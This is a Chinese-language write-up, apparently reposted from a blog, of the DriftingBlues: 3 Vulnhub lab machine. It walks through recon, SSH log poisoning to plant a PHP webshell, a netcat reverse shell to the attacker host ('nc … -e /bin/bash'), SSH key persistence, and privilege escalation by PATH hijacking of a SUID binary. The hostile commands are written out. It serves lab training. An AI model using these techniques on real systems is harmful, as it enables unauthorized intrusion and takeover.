[Vulnhub靶机] DriftingBlues: 3

2024-01-10 06:03:23

[Vulnhub靶机] DriftingBlues: 3靶机渗透思路及方法(个人分享)

靶机下载地址:

https://download.vulnhub.com/driftingblues/driftingblues3.ova


靶机地址:192.168.67.19

攻击机地址:192.168.67.3


一、信息收集

1.使用 arp-scan?命令扫描网段内存活的主机,以获取靶机ip地址

arp-scan -I?指定网卡 -l

2.使用?nmap?工具扫描靶机开放端口、服务版本以及系统版本,得到开放端口22、80及其服务ssh、http

nmap -sV -O?靶机地址

? ? ? ? -sV? ? ? ? 探测主机服务版本

? ? ? ? -O? ? ? ? ?识别主机操作系统

3.访问web网页,没有发现有用信息,尝试使用?dirsearch?工具扫描靶机网站目录,得到robots.txt

dirsearch -u?靶机URL

? ? ? ? -u????????指定目标URL

4.访问靶机 robots.txt 页面,得到 /eventadmins?页面

5.继续访问 /eventadmins ,得到提示。提示中说明ssh可能存在漏洞,还得到了?/littlequeenofspades.html 页面

6.继续访问?/littlequeenofspades.html ,发现页面没有有用信息回显,查看网页源代码得到一串base64加密的内容

7.通过两次base64解密后得到 /adminsfixit.php,查看后发现该文件为ssh身份验证日志文件

二、漏洞利用

分析ssh日志文件后发现,ssh远程连接时登录的用户名会被写入到该文件内,尝试利用该漏洞将一句话木马写入到?/adminsfixit.php内

重新访问?/adminsfixit.php 网页,并通过cmd参数进行测试,发现成功写入

三、反弹shell

1.进行反向反弹shell,攻击机开启?nc?监听

nc -lvp?监听端口号?靶机地址

? ? ? ? -l? ? ? ? ?????开启监听

? ? ? ? -v? ? ? ? ????显示详细输出

? ? ? ? -p? ? ? ? ? ? 指定监听端口

2.利用木马执行?nc 命令,尝试反弹shell

nc?攻击机地址?监听端口号 -e /bin/bash

? ? ? ? -e? ? ? ? 指定对应的应用程序

3.成功反弹shell,进入靶机并成功执行命令

4.利用python中pty模块的创建交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

? ? ? ? -c? ? ? ? 在命令行中调用python代码

pty.spawn()?函数是pty模块中的一个函数,用于创建一个子进程,并将其连接到一个伪终端。通过这个伪终端,我们可以与子进程进行交互,就像在控制台上一样。

5.分析查看靶机内文件,发现home目录下有一个robertj用户,且该用户目录下存在两个文件,user.txt”文件没有权限无法打开,.ssh?目录有可读可写可执行权限

6.进入?.ssh?目录进行查看,发现目录内没有任何文件内容

7.继续查看分析,查看ssh配置文件(默认目录/etc/ssh/sshd_config),发现可以公钥登录,并且给出了公钥文件存放目录?/home/robertj/.ssh/authorized_keys

8.尝试把公钥放入.ssh目录内,使用?ssh-keygen?工具生成公密钥,并将生成的密钥保存到 /home/robertj/.ssh/ 目录下

ssh-keygen -t?rsa

? ? ? ? -t? ? ? ? 指定生成的密钥类型,默认为RSA类型

9.将生成的公钥内容输出到authorized_keys文件内

10.查看私钥文件,将内容复制出来,粘贴到本地文件中

注意要将id_rsa文件的权限修改为与创建时权限一致

11.使用私钥进行登录,成功登录robertj用户

ssh?robertj@192.168.66.140 -i?id_rsa

? ? ? ? -i? ? ? ? 指定身份验证文件,用于身份验证

四、提权

1.使用?find?命令寻找suid程序,发现一个可疑程序/usr/bin/getinfo

find / -perm -4000 2>/dev/null 或?find / -perm -u=s?2>/dev/null

? ? ? ? -perm? ? ? ? ?按照权限查找文件(4000、2000、1000分别表示SUID,SGID,SBIT权限,如777为普通文件最高权限,7000为特殊文件的最高权限)

使用find命令的时候在命令后加 2>/dev/null?将错误结果输出重定向到/dev/null中,/dev/null是一个特殊的设备文件,其实质为空设备文件,其大小是0字节,所有人都有读写权限,而其主要作用就是将接收的一切输出给它的数据并丢弃,就像垃圾桶,也被称为位桶(bit bucket)

2.执行该程序,根据执行结果发现分别运行了ip addr、cat /etc/hosts、uname -a命令

3.可以通过修改环境来进行命令劫持提权

通过修改环境变量让getinfo在调用命令调用到我们伪造的ip命令(在检索环境时会先调用最前面的环境也就是最新写入的环境),来达到提权的效果

export?PATH=/tmp/:$PATH? ? ? ? ? ? ?把/tmp路径写入到系统路径中

cd /tmp

echo '/bin/bash'?> ip???????????????????????把/bin/bash写入到ip文件中(相当于创建ip并写入/bin/bash)

chmod?+x?ip? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??给ip文件增加执行权限

4.再次运行getinfo,成功提权至root权限

文章来源:https://blog.csdn.net/haosha__demingzi/article/details/134341730
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。